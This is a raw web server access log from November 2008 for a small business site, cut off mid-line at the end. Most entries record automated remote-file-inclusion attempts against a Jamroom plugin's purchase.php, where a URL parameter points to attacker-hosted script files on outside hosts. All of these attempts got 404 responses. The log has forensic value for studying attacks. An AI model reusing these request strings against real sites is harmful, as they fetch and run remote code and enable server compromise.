70.85.192.194 - - [07/Nov/2008:01:41:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r00x.helloweb.eu/s/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "autobutlerlifts.com"
70.85.192.194 - - [07/Nov/2008:02:00:55 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r00x.helloweb.eu/s/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
70.85.192.194 - - [07/Nov/2008:02:00:55 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r00x.helloweb.eu/s/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
70.85.192.194 - - [07/Nov/2008:02:00:55 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r00x.helloweb.eu/s/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
87.106.245.44 - - [07/Nov/2008:02:09:42 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
70.38.12.204 - - [07/Nov/2008:02:11:27 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
86.109.103.251 - - [07/Nov/2008:02:11:51 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
193.95.93.158 - - [07/Nov/2008:02:19:17 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
213.247.43.5 - - [07/Nov/2008:02:35:36 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.247.43.5 - - [07/Nov/2008:02:35:36 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.247.43.5 - - [07/Nov/2008:02:35:36 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
87.106.245.44 - - [07/Nov/2008:02:37:12 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
87.106.245.44 - - [07/Nov/2008:02:37:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
87.106.245.44 - - [07/Nov/2008:02:37:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
86.109.103.251 - - [07/Nov/2008:02:39:29 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
86.109.103.251 - - [07/Nov/2008:02:39:29 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
86.109.103.251 - - [07/Nov/2008:02:39:29 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
70.38.12.204 - - [07/Nov/2008:02:41:13 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
70.38.12.204 - - [07/Nov/2008:02:41:13 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
70.38.12.204 - - [07/Nov/2008:02:41:13 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
193.95.93.158 - - [07/Nov/2008:02:54:32 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
193.95.93.158 - - [07/Nov/2008:02:54:32 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
193.95.93.158 - - [07/Nov/2008:02:54:32 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
66.249.71.41 - - [07/Nov/2008:03:13:32 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.40 - - [07/Nov/2008:03:13:32 -0800] "GET /logs/ HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.41 - - [07/Nov/2008:04:10:13 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.40 - - [07/Nov/2008:04:33:42 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.82 - - [07/Nov/2008:05:36:16 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [07/Nov/2008:05:36:16 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [07/Nov/2008:05:36:17 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [07/Nov/2008:07:26:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutl